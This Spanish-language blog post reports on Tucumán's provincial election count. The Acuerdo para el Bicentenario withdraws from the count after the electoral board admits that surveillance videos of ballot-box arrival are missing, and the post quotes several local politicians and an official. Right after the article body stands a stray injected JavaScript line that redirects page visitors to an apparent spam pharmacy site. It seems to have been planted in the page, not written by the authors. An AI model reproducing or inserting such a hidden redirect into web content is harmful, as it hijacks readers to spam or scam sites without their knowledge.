El ApB anuncia que hoy se retira del escrutinio

La de ayer fue una jornada inusual en la Junta Electoral Provincial (JEP). Y no precisamente porque el escrutinio definitivo se haya agilizado sobremanera (ayer se escrutaron unas 300 urnas de la sección Oeste). Pasadas las 18, la información que daba cuenta sobre la ausencia de los videos que debían mostrar la llegada de las urnas a JEP el día 23 de agosto se propagó rápidamente en el galpón donde fiscales y empleados del órgano veedor de los comicios realizan su trabajo. Ese hecho, que fue noticia en todos los medios del país, fue el comentario obligado hasta el cierre de la jornada y obligó a los referentes del Acuerdo para el Bicentenario (ApB) a tomar una decisión clave en el proceso electoral: anunciaron que hoy ya no participarán del recuento de votos.
Así lo hizo saber el candidato a legislador por el Oeste y actual funcionario municipal, Walter Berarducci.
“En virtud de los informes presentados por la Junta Electoral Provincial en la Cámara en lo Contencioso Administrativo sobre el reconocimiento expreso de la pérdida de las filmaciones y videos que debían registrar los momentos de distribución recepción y custodia de las urnas, el Acuerdo para el Bicentenario comunicó al órgano veedor de los comicios que se retira del escrutinio definitivo por haberse violado el sustento primigenio de la democracia, cual es la voluntad del soberano”, planteó Berarducci.
Otros dirigentes del ApB, como el peronista disidente Enrique Romero, realizaron planteos in situ a la JEP. Concretamente, Romero solicitó información sobre contrato de locación de servicios entre Gendarmería y la empresa encargada de la instalación de las cámaras de seguridad. También exigió el nombre y rango del encargado del operativo de custodia de las urnas, desde las escuelas hasta la sede de la JEP. “También he exigido los nombres y apellidos de los gendarmes encargados del monitoreo de las cámaras instaladas en el órgano veedor de los comicios”, señaló a LA GACETA el peronista aliado al canismo.
El momento de tensa calma se cortó pasadas las 20, cuando un grupo de dirigentes del Movimiento de Unidad Popular (MUP) comenzó a festejar la obtención de 600 votos nuevos en la localidad de Alberdi. “Estamos contentos porque un concejal de nuestro espacio está ingresando. Esto nos lleva a mantener firmes las esperanzas de poder hacer ingresar un legislador por el Oeste. En estos momentos estamos por encima de Fuerza Republicana y de algunos acoples fuertes del Frente para la Victoria”, expresó Luis Romano, actual concejal de Alberdi y referente provincial del MUP. Sobre el desarrollo del escrutinio, Romano señaló: “ la oposición debe aceptar la derrota, porque si bien hubo errores en la carga de los telegramas en el correo, esta situación perjudicó a todas las fuerzas por igual. Nosotros mismos, que somos parte oficialismo, fuimos perjudicados. Sin embargo, el impecable trabajo que lleva adelante la Junta Electoral Provincial permitió subsanar estos errores y transparentar el escrutinio”.
Respecto a la finalización del recuento definitivo de los votos, el secretario de la JEP, Darío Almaraz, calculó que el escrutinio definitivo podría estar finalizando entre el martes y jueves de la próxima semana. “Si seguimos con este ritmo, es muy probable que culminemos los primeros días de la próxima semana, martes o miércoles”, avizoró. En la jornada de hoy continuará el recuento de La Cocha y comenzarán con la localidad de Las Talitas.
Con el recuento de ayer, el FpV superó por dos puntos al ApB.

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *